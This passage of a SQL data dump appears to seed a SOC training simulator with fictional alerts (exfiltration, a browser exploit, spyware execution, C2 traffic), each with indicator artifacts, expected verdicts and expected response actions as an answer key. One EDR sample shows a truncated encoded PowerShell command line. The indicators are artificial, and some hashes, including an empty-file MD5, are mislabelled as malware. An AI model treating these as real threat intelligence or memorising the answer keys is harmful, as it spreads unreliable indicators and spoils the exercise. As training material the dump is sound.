Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Company Directory\",\"verdict\":\"suspicious\",\"details\":\"Credentials possibly compromised\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Antivirus Database\",\"verdict\":\"malicious\",\"details\":\"File associated with known malware\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1526, 'Data Exfiltration Initiated', 'high', 'Data Loss Prevention Logs', 'Having infiltrated the network, the attackers begin exfiltrating data, focusing on personal and proprietary information. The attackers use multiple techniques to evade detection while transferring data to an external server.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-09T14:23:07Z\",\"event_type\":\"data_exfiltration\",\"internal_ip\":\"10.0.15.21\",\"external_ip\":\"203.0.113.45\",\"user\":\"jane.doe\",\"filename\":\"confidential_project_plan.docx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"destination_domain\":\"malicious-download.com\",\"bytes_transferred\":5242880,\"alert_trigger\":\"Data exfiltration threshold exceeded\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known exfiltration activity\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account possibly compromised\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_project_plan.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document being exfiltrated\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"clean\",\"details\":\"Common hash, potentially altered file\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"malicious-download.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain involved in known malicious activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1527, 'Evidence of Human Rights Violation Gathered', 'critical', 'Human Rights Watch Reports', 'The final analysis reveals broader implications of the spyware, emphasizing the erosion of privacy and its impact on human rights defenders. This operation has uncovered significant evidence of human rights violations facilitated through the use of spyware.', 'Impact', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"event_id\":\"HRW-2023-1059\",\"user\":\"john.doe@organization.org\",\"internal_ip\":\"192.168.4.23\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"spyware_report.docx\",\"action\":\"Data Exfiltration\",\"description\":\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"description\":\"External command and control server associated with attack\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Malware sample used in the operation\"},{\"type\":\"filename\",\"value\":\"spyware_report.docx\",\"description\":\"File containing exfiltrated data\"},{\"type\":\"username\",\"value\":\"john.doe@organization.org\",\"description\":\"Compromised user account\"}]}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C&C server used in multiple APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known spyware sample\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"spyware_report.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains exfiltrated sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe@organization.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account compromised during the incident\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:57:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:56:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:55:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:54:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1528, 'Suspicious Browser Exploit Detected', 'high', 'Firewall and IDS/IPS logs', 'Unusual network traffic patterns were detected, indicating a potential browser exploit targeting Windows systems. The exploit appears to be leveraging known vulnerabilities to gain initial access.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_port\":80,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"request_url\":\"http://compromised-site.com/exploit.js\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"exploit.js\",\"detected_signature\":\"Candiru Browser Exploit\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Candiru activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company IP.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://compromised-site.com/exploit.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL hosting exploit code.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exploit scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1529, 'Malicious Payload Execution', 'high', 'Endpoint Protection Logs', 'Following the initial breach, the attackers deploy their spyware payload, which is designed to execute stealthily within the Windows environment, aiming to gather sensitive information from the target.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"payload_filename\":\"spyware_payload.exe\",\"payload_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"Execution\",\"status\":\"Success\",\"details\":\"Detected execution of a known spyware payload on host 192.168.1.5 by user jdoe. The payload was executed from source IP 203.0.113.45.\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate asset.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known spyware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"spyware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Protection Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with spyware delivery.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1530, 'Establishing Command and Control', 'medium', 'Network Traffic Analysis', 'Anomalous encrypted traffic detected from an internal host to an external IP, indicating a potential command and control setup. The communication was observed using TLS over non-standard ports, which is a common tactic to evade detection.', 'Persistence', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:07Z\",\"src_ip\":\"10.0.2.15\",\"dest_ip\":\"203.0.113.25\",\"dest_port\":8443,\"protocol\":\"TLS\",\"encrypted\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"C2Agent.exe\",\"alert\":\"Suspicious encrypted traffic detected\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP associated with APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash identified as C2Agent variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C2Agent.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual file found on host, correlates with C2 activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1531, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'Sensitive data exfiltration from compromised systems targeting activists and journalists. The attackers are using malicious IPs to extract communications and documents.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.55\",\"destination_port\":443,\"username\":\"jdoe\",\"filename\":\"Sensitive_Communications.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action_taken\":\"Blocked\",\"protocol\":\"HTTPS\",\"rule_triggered\":\"Exfiltration Rule 7\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"Sensitive_Communications.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive keywords.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee account used in exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 